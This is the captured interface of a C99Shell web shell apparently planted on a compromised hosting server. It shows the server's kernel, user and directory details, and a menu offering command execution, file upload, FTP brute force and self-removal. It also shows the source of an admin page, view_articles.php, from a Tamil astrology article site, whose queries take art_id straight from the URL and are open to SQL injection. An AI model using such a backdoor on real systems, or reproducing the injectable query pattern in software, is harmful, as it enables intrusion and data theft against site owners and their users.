!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/home/www/jothidam.tv/admin/   drwxr-xr-x
Free 3293.14 GB of 8036.27 GB (40.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     view_articles.php (4.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('include/header.php');
include(
'include/conn.php');
error_reporting(E_ALL);
ini_set('display_errors'1);
$art_id $_GET['art_id'];

$sql "SELECT * FROM articles WHERE art_id = $art_id";
$res mysqli_query($conn$sql);
$row mysqli_fetch_assoc($res);
?>

<link href="https://cdn.datatables.net/1.12.1/css/jquery.dataTables.min.css" rel="stylesheet" type="text/css">
<link href="https://cdn.datatables.net/buttons/2.2.3/css/buttons.dataTables.min.css" rel="stylesheet" type="text/css">

<style>
    table {
        width: 600px;
        margin: auto;
    }

    table,
    tr,
    th,
    td {
        border: 1px solid black;
    }

    p {
        text-indent: 100px;
        text-align: justify;
    }
</style>
<style>
    .ending_img {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 70vw;
    }
</style>

<!-- begin MAIN PAGE CONTENT -->
<div id="page-wrapper" style="min-height:142vh;">
    <div class="page-content">
        <!-- begin PAGE TITLE ROW -->
        <div class="row rounded ">
            <div class="head">
                <h2 class="text-center"><?= $row['art_title'?></h2>
            </div>
            <div class="head">
                <h5 class="text-center"><?= $row['art_sub_title'?></h5>
            </div>
            <div class="head">
                <h5 class="text-center"><?= $row['art_author'?></h5>
            </div>
        </div>
        <div class="art_index_table">
            <table class="table">
                <thead>
                    <tr>
                        <th scope="col">நிகழ்வு</th>
                        <th scope="col">தலைப்பு </th>
                </thead>
                <tbody>
                    <?php
                    $sql_art 
"SELECT art_heading_name FROM article_content_table WHERE art_for_id = $art_id";
                    
$res_art mysqli_query($conn$sql_art);

                    if (
$res_art) {
                        
$i 1;
                        while (
$rows mysqli_fetch_assoc($res_art)) {
                    
?>

                            <tr>
                                <th scope="row"><?= $i ?></th>
                                <td><?= $rows['art_heading_name'?></td>
                            </tr>

                    <?php
                            $i
++;
                        }
                    }
                    
?>
                </tbody>
            </table>
        </div>
        <div class="intro">
            <h4 class="text-center">முன்னுரை</h4>
            <p style="text-indent: 100px;text-align:justify;"><?= $row['art_intro'?></p>
        </div>

        <div class="row article body">
            <?php
            $sql_art 
"SELECT * FROM article_content_table WHERE art_for_id = $art_id";
            
$res_art mysqli_query($conn$sql_art);

            if (
$res_art) {

                while (
$rows mysqli_fetch_assoc($res_art)) {

            
?>
                    <div class="article_head">
                        <h4><?= $rows['art_heading_name'?></h4>
                    </div>
                    <div class="article_body">
                        <p><?= $rows['art_body_contents'?></p>
                    </div>


            <?php

                
}
            }

            
?>
        </div>
        <div class="conclusion">
            <h4 class="text-center">முடிவுரை</h4>
            <p style="text-indent: 100px;text-align:justify;"><?= $row['art_conclusion'?></p>
        </div>
        <div class="thanks">
            <p class="text-center">என்றென்றும் நன்றியுடன்....</p><br>
            <p class="text-end">ALP ஜோதிடர் & <br>
                ALP ஜோதிட ஆசிரியர்<br>
                என்ற பெருமையுடன்<br>
                <span class="text-dark"><b><?= $row['art_author'?></b></span>
            </p>
        </div>

        <div class="ending_img">
            <img src="./img/—Pngtree—end page design_8510473.png" alt="" style="width: 200px; height: 130px;">
        </div>
        <hr>
        <!-- /.col-lg-12 -->
    </div>
    <!-- /.row -->
</div>
<!-- /.page-content -->
</div>
<!-- /#page-wrapper -->

<!-- begin FOOTER -->
<?php include('include/footer.php'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0262 ]--